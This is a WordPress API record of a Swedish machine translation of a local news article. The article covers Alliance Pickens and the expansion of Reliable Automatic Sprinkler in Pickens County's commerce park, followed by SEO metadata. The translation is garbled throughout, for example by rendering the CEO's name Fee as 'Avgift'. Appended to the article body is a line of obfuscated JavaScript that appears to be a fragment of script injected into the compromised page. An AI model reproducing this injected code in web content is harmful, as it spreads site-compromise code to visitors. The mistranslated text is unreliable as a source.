{"id":8895,"date":"2020-10-28T16:32:25","date_gmt":"2020-10-28T16:32:25","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/"},"modified":"2021-07-21T23:23:34","modified_gmt":"2021-07-21T23:23:34","slug":"alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/","title":{"rendered":"Alliance Pickens direkt\u00f6r s\u00e4ger County &#8220;mycket v\u00e4l positionerat&#8221; f\u00f6r framtida tillverkning investeringar"},"content":{"rendered":"<p>Av GREG OLIVER<br \/>\nTIDSKRIFTEN<br \/>\nPICKENS COUNTY &#8211; Alliance Pickens verkst\u00e4llande direkt\u00f6r Ray Farley har bevittnat tillstr\u00f6mningen av ekonomisk utveckling vid Pickens County Commerce Park. Men som alla ekonomiska tj\u00e4nstem\u00e4n, har Farley ocks\u00e5 sett tiden g\u00e5 n\u00e4r inga tillk\u00e4nnagivanden av ny industri eller expansioner intr\u00e4ffade.<br \/>\nNaturligtvis f\u00f6redrar Farley att se ekonomisk utveckling verksamhet. F\u00f6rra veckan hade Alliance Pickens huvudet m\u00f6jlighet att tillk\u00e4nnage de senaste positiva ekonomiska nyheter med utbyggnaden av Reliable Automatic Sprinkler Co, Inc. Verksamheten expansion \u00e4r en $ 23.100.000 kapitalinvesteringar som kommer att skapa 100 arbetstillf\u00e4llen och f\u00f6ra Reliable totala anl\u00e4ggning till 452.000 kvadratmeter.<br \/>\nFarley sa att han k\u00e4nner den f\u00f6rsta stora ekonomiska utvecklingen sedan TaylorMade Golf Company flyttade fr\u00e5n Westminster till Pickens County Commerce Park tre \u00e5r sedan kommer att vara ett f\u00f6rebud om mer fram\u00f6ver.<br \/>\n&#8220;Vi har anledning till optimism,&#8221; Farley sa. &#8220;Pickens County \u00e4r mycket v\u00e4l positionerat f\u00f6r att ta emot mer tillverkning investeringar p\u00e5 grund av ett par saker &#8211; volymen och hastigheten av kvalificerad arbetskraft eller tj\u00e4nsteleverant\u00f6rer med sina sinnen och h\u00e4nder som g\u00e5r in i Pickens County arbetskraften och, tv\u00e5, v\u00e5r kostnadsstruktur h\u00e4r f\u00f6r tillverkning \u00e4r mycket attraktiv n\u00e4r man j\u00e4mf\u00f6r det med resten av syd\u00f6stra.&#8221;<br \/>\nFarley har haft sin del av den ekonomiska utvecklingen tillk\u00e4nnagivanden under sin tid. Den 310 tunnland Pickens County Commerce Park sj\u00e4lv funktioner St Jude Medical, KeyMark, Inc., Tri-Tech USA, transformatorstationer f\u00f6r Duke Energy och Blue Ridge Electric Cooperative och AT &amp; T digital fiber switch. Alliance Pickens flyttade ocks\u00e5 sitt huvudkontor till en nybyggd anl\u00e4ggning i parken f\u00f6rra \u00e5ret och det finns n\u00e4stan 1.200 anst\u00e4llda tillsammans som \u00e4r anst\u00e4llda genom parkens verksamhet och industrier.<br \/>\nEn av de saker Farley anser kommer att gynna den ekonomiska utvecklingen i Pickens County, antingen genom handelsparken eller andra webbplatser, \u00e4r arbetskraftens utveckling och Scholar Technician program.<br \/>\n&#8220;Det f\u00f6rmodligen bidrar till att generera stark aktivitet i oss eftersom marknaden f\u00e4rdigheter i Pickens County \u00e4r p\u00e5 den snabba kurvan f\u00f6r att \u00f6verbrygga kompetensklyftan i USA och generera en teknik engagerad arbetskraft som kr\u00e4vs f\u00f6r en STEM marknadsplats,&#8221; Farley sa.<br \/>\nUtveckling av arbetskraften definieras som ett f\u00f6rs\u00f6k att \u00f6ka den ekonomiska stabiliteten och v\u00e4lst\u00e5ndet i en region genom att fokusera p\u00e5 m\u00e4nniskor snarare \u00e4n f\u00f6retag. Den Pickens County Scholar Technician \u00e4r den student som utm\u00e4rker sig i klassrummet m\u00e5ndag till fredag samt genom fritidsaktiviteter och, genom studiekurs, l\u00e4r sig och utvecklar tekniska f\u00e4rdigheter som kr\u00e4vs i dagens avancerade tillverkningsmilj\u00f6.<br \/>\nPickens County utvecklar sitt Scholar Technician program s\u00e5 tidigt som dagis och upp genom tv\u00e5 \u00e5r p\u00e5 Tri-County Technical College.<br \/>\nN\u00e4r Farley arbetar p\u00e5 att locka nya f\u00f6retag och industrin till Pickens County, kan han kanske ta med Kevin Fee, vd f\u00f6r Reliable Automatic Sprinkler Co, Inc. Fee sa att han s\u00e5ldes p\u00e5 South Carolina, och s\u00e4rskilt Pickens County omr\u00e5det, n\u00e4r det g\u00e4llde att flytta det familje\u00e4gda f\u00f6retaget fr\u00e5n New York.<br \/>\nAvgift planerade ursprungligen att \u00f6verv\u00e4ga antingen North Carolina eller Virginia f\u00f6r omlokalisering. Men p\u00e5 envishet av Bill Kirkpatrick, senior vice president f\u00f6r tillverkning f\u00f6r Reliable, best\u00e4mde han sig f\u00f6r att bes\u00f6ka Palmetto staten. &#8220;Vi var s\u00e5 l\u00e5ngt fram i v\u00e5r djupg\u00e5ende analys f\u00f6r antingen Virginia eller North Carolina att vi var redo att fatta ett beslut mellan de tv\u00e5,&#8221; Fee sa. &#8220;Bill s\u00e4ger att du m\u00e5ste komma till South Carolina. Jag kom och k\u00e4nde likadant. Det h\u00e4r var en p\u00e4rla, det h\u00e4r var en juvel. Staten hoppade in med Pickens County och satte ihop paketet. Vi vill vara h\u00e4r.&#8221;<br \/>\nInte bara var Fee fascinerad av sk\u00f6nheten i staten och det v\u00e4nliga s\u00e4tt p\u00e5 vilket hans familj h\u00e4lsades, men han upplevde ocks\u00e5 sin f\u00f6rsta Clemson fotbollsmatch.<br \/>\nI 2003, Fee, en Boston College, sade han och hans br\u00f6der deltog i Clemson-Boston College t\u00e4vlingen.<br \/>\n&#8220;Den dagen vid Clemson University var en stor dag,&#8221; Fee sa. &#8220;Vi fick g\u00e5 p\u00e5 f\u00e4ltet och mina tv\u00e5 br\u00f6der f\u00f6rs\u00f6kte sparka f\u00e4lt m\u00e5l och en bl\u00e5ste ut ett kn\u00e4 och den andra hade en hamstring dra.&#8221;<br \/>\nFee sa att han tr\u00e4ffade en friidrott tj\u00e4nsteman och efter att utan framg\u00e5ng f\u00f6rs\u00f6ka samla biljetter p\u00e5 50- och senare 40-yard linjer, accepterade ett erbjudande om att k\u00f6pa en lyx l\u00e5da p\u00e5 10-yard linjen. Farley minns dagen v\u00e4l.<br \/>\n&#8220;Det var som att titta p\u00e5 ett g\u00e4ng 18-\u00e5ringar g\u00f6r ner och outs och krokar knapp,&#8221; Farley sa. &#8220;Men det var den dagen vi kom tillsammans och enade som ett team &#8211; Pickens County och Reliable &#8211; och det forts\u00e4tter till denna dag. Detta \u00e4r beviset i puddingen d\u00e5 75 procent av Reliables anst\u00e4llda \u00e4r fr\u00e5n Pickens County.&#8221;<br \/>\nP\u00e5litlig markerade den f\u00f6rsta hyresg\u00e4sten i Pickens County Commerce Park och den f\u00f6rsta av m\u00e5nga ekonomiska utveckling tillk\u00e4nnagivanden att \u00e4ga rum under de senaste tiotal \u00e5ren. Farley sade ocks\u00e5 att han aldrig kommer att gl\u00f6mma den f\u00f6rsta reaktionen han fick n\u00e4r man tar Fee och Kirkpatrick till den plats d\u00e4r de s\u00e5 sm\u00e5ningom skulle bygga och, nu f\u00f6r andra g\u00e5ngen, expandera sin verksamhet.<br \/>\n&#8220;Jag ledde dig p\u00e5 denna \u00e5s topp och titta p\u00e5 knolls, mitt i ett g\u00e4ng bj\u00f6rnb\u00e4r buskar, f\u00f6rs\u00f6ker ber\u00e4tta hur allt detta kan l\u00e4gga ut perfekt,&#8221; Farley sa. &#8220;Bill tittar p\u00e5 mig som jag har tre \u00f6gon och f\u00f6rs\u00f6ker h\u00e5lla Kevins uppm\u00e4rksamhet. Men, genom golly, du fick det att fungera.&#8221;<br \/>\nSom en symbol f\u00f6r vad Reliable har betytt f\u00f6r den ekonomiska strukturen i Pickens County samt att symboliskt fira hur l\u00e5ngt l\u00e4ngs l\u00e4net har kommit i ekonomisk utveckling, presenterade Farley Avgift med en Clemson fotboll undertecknad av Pickens County Council.<br \/>\n&#8220;Vi \u00e4r i dag \u00f6ver m\u00e5llinjen,&#8221; sade han.<br \/>\nMedan han och hans familj \u00e4r glada \u00f6ver att forts\u00e4tta sitt engagemang f\u00f6r Pickens County, sade Fee f\u00f6retaget ocks\u00e5 vill hj\u00e4lpa l\u00e4net att locka ytterligare f\u00f6retag och industrier i framtiden.<br \/>\n&#8220;Vi kan vara en av dina st\u00f6rsta remisser och n\u00e4r du beh\u00f6ver ge en h\u00e4nvisning p\u00e5 webbplatsen till blivande Pickens County industrier, ring oss eftersom vi \u00e4r en stark anh\u00e4ngare av Pickens County,&#8221; Fee sa. &#8221; Vi vill g\u00f6ra allt vi kan f\u00f6r att forts\u00e4tta v\u00e4xa och utveckla det partnerskapet. Vi vill finnas d\u00e4r f\u00f6r dig ocks\u00e5.&#8221;<br \/>\ngoliver@upstatetoday.com | (864) 973-6687<br \/>\nF\u00f6lj p\u00e5 Twitter @ JOURNALGO<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Av GREG OLIVER TIDSKRIFTEN PICKENS COUNTY &#8211; Alliance Pickens verkst\u00e4llande direkt\u00f6r Ray Farley har bevittnat tillstr\u00f6mningen av ekonomisk utveckling vid Pickens County Commerce Park. Men som alla ekonomiska tj\u00e4nstem\u00e4n, har Farley ocks\u00e5 sett tiden g\u00e5 n\u00e4r inga tillk\u00e4nnagivanden av ny industri eller expansioner intr\u00e4ffade. Naturligtvis f\u00f6redrar Farley att se ekonomisk utveckling verksamhet. F\u00f6rra veckan hade&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5105,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[56],"tags":[],"class_list":["post-8895","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-sv","category-56","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Alliance Pickens direkt\u00f6r s\u00e4ger County &quot;mycket v\u00e4l positionerat&quot; f\u00f6r framtida tillverkning investeringar - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Alliance Pickens direkt\u00f6r s\u00e4ger County &quot;mycket v\u00e4l positionerat&quot; f\u00f6r framtida tillverkning investeringar - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"Av GREG OLIVER TIDSKRIFTEN PICKENS COUNTY &#8211; Alliance Pickens verkst\u00e4llande direkt\u00f6r Ray Farley har bevittnat tillstr\u00f6mningen av ekonomisk utveckling vid Pickens County Commerce Park. Men som alla ekonomiska tj\u00e4nstem\u00e4n, har Farley ocks\u00e5 sett tiden g\u00e5 n\u00e4r inga tillk\u00e4nnagivanden av ny industri eller expansioner intr\u00e4ffade. Naturligtvis f\u00f6redrar Farley att se ekonomisk utveckling verksamhet. F\u00f6rra veckan hade&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T16:32:25+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T23:23:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"990\" \/>\n\t<meta property=\"og:image:height\" content=\"618\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"Alliance Pickens direkt\u00f6r s\u00e4ger County &#8220;mycket v\u00e4l positionerat&#8221; f\u00f6r framtida tillverkning investeringar\",\"datePublished\":\"2020-10-28T16:32:25+00:00\",\"dateModified\":\"2021-07-21T23:23:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/\"},\"wordCount\":1203,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"articleSection\":[\"News\"],\"inLanguage\":\"sv-SE\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/\",\"name\":\"Alliance Pickens direkt\u00f6r s\u00e4ger County \\\"mycket v\u00e4l positionerat\\\" f\u00f6r framtida tillverkning investeringar - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"datePublished\":\"2020-10-28T16:32:25+00:00\",\"dateModified\":\"2021-07-21T23:23:34+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"width\":990,\"height\":618,\"caption\":\"Alliance Pickens Logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Alliance Pickens direkt\u00f6r s\u00e4ger County &#8221;mycket v\u00e4l positionerat&#8221; f\u00f6r framtida tillverkning investeringar\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Alliance Pickens direkt\u00f6r s\u00e4ger County \"mycket v\u00e4l positionerat\" f\u00f6r framtida tillverkning investeringar - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/","og_locale":"sv_SE","og_type":"article","og_title":"Alliance Pickens direkt\u00f6r s\u00e4ger County \"mycket v\u00e4l positionerat\" f\u00f6r framtida tillverkning investeringar - Alliance Pickens","og_description":"Av GREG OLIVER TIDSKRIFTEN PICKENS COUNTY &#8211; Alliance Pickens verkst\u00e4llande direkt\u00f6r Ray Farley har bevittnat tillstr\u00f6mningen av ekonomisk utveckling vid Pickens County Commerce Park. Men som alla ekonomiska tj\u00e4nstem\u00e4n, har Farley ocks\u00e5 sett tiden g\u00e5 n\u00e4r inga tillk\u00e4nnagivanden av ny industri eller expansioner intr\u00e4ffade. Naturligtvis f\u00f6redrar Farley att se ekonomisk utveckling verksamhet. F\u00f6rra veckan hade&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T16:32:25+00:00","article_modified_time":"2021-07-21T23:23:34+00:00","og_image":[{"width":990,"height":618,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","type":"image\/jpeg"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"Alliance Pickens direkt\u00f6r s\u00e4ger County &#8220;mycket v\u00e4l positionerat&#8221; f\u00f6r framtida tillverkning investeringar","datePublished":"2020-10-28T16:32:25+00:00","dateModified":"2021-07-21T23:23:34+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/"},"wordCount":1203,"image":{"@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","articleSection":["News"],"inLanguage":"sv-SE"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/","url":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/","name":"Alliance Pickens direkt\u00f6r s\u00e4ger County \"mycket v\u00e4l positionerat\" f\u00f6r framtida tillverkning investeringar - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","datePublished":"2020-10-28T16:32:25+00:00","dateModified":"2021-07-21T23:23:34+00:00","author":{"@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/"]}]},{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","width":990,"height":618,"caption":"Alliance Pickens Logo"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/alliance-pickens-direktor-sager-county-mycket-val-positionerat-for-framtida-tillverkning-investeringar\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Alliance Pickens direkt\u00f6r s\u00e4ger County &#8221;mycket v\u00e4l positionerat&#8221; f\u00f6r framtida tillverkning investeringar"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/sv\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts\/8895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=8895"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts\/8895\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media\/5105"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=8895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/categories?post=8895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/tags?post=8895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}